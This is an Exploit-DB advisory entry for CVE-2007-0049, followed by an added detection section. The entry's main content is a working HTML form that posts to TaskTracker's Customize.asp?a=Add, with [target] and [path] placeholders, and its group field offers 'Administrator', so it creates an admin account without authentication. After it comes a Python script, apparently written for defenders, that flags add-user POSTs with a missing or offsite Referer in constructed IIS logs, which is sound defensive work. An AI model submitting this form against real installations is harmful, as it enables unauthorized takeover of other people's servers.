TaskTracker <= 1.5 Customize.asp Remote Add Administrator Exploit

2007-01-01T00:00:00
ID EDB-ID:3068
Type exploitdb
Reporter ajann
Modified 2007-01-01T00:00:00

Description

TaskTracker <= 1.5 (Customize.asp) Remote Add Administrator Exploit. CVE-2007-0049. Webapps exploit for asp platform

                                        
<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
	<td valign=top class='data3'>
		<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<select name="GroupID" class="selectedtextboxes">
			<option value="1">Publisher</option>
			<option value="2">Editor</option>

			<option value="3">Administrator</option>
		</select>
	</td>
	<td valign=middle class='data3' align="center" colspan="2" align="center">
		<input type="submit" value="Gonder">
	</form>

# milw0rm.com [2007-01-01]
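
Detection sketch for defenders (an added example, not part of the original advisory or of TaskTracker): the form above is a standalone page that posts to Customize.asp?a=Add, so the resulting request reaches the server with no Referer or with one naming another host. The Python below scans IIS W3C extended logs for such requests. The log sample, host names and addresses are constructed, and it assumes the cs-host and cs(Referer) fields are being logged. Referer is client-controlled, so treat hits as a triage signal rather than proof.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed IIS W3C extended log sample (hosts, paths and addresses are placeholders).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(Referer)
2007-01-02 10:01:11 192.0.2.10 GET /tasktracker/Customize.asp - 200 tracker.example.test http://tracker.example.test/tasktracker/Default.asp
2007-01-02 10:01:40 192.0.2.10 POST /tasktracker/Customize.asp a=Add 302 tracker.example.test http://tracker.example.test/tasktracker/Customize.asp
2007-01-02 11:15:02 198.51.100.7 POST /tasktracker/Customize.asp a=Add 302 tracker.example.test -
2007-01-02 11:20:45 203.0.113.5 POST /tasktracker/customize.asp a=Add 200 tracker.example.test http://other.example.test/form.html
"""


def find_offsite_add_user_posts(log_text):
    """Return (date, time, client_ip, referer) for each POST to Customize.asp?a=Add
    whose Referer is missing or names a host other than the one requested."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order may be redeclared mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed or truncated row
        row = dict(zip(fields, values))
        if row.get("cs-method") != "POST":
            continue
        # IIS paths are case-insensitive, so compare the stem in lower case.
        if not row.get("cs-uri-stem", "").lower().endswith("/customize.asp"):
            continue
        # Match the action parameter conservatively (case-insensitive key and value).
        if "add" not in parse_qs(row.get("cs-uri-query", "").lower()).get("a", []):
            continue
        referer = row.get("cs(Referer)", "-")
        ref_host = (urlsplit(referer).hostname or "") if referer != "-" else ""
        host = row.get("cs-host", "-").lower().split(":")[0]
        if not ref_host or ref_host != host:
            hits.append((row.get("date"), row.get("time"), row.get("c-ip"), referer))
    return hits


if __name__ == "__main__":
    for hit in find_offsite_add_user_posts(SAMPLE_LOG):
        print("suspicious add-user POST:", *hit)
```

Correlate any hit with the application's user table: an account in the Administrator group (GroupID 3 in the form above) created at the same timestamp is the follow-up check.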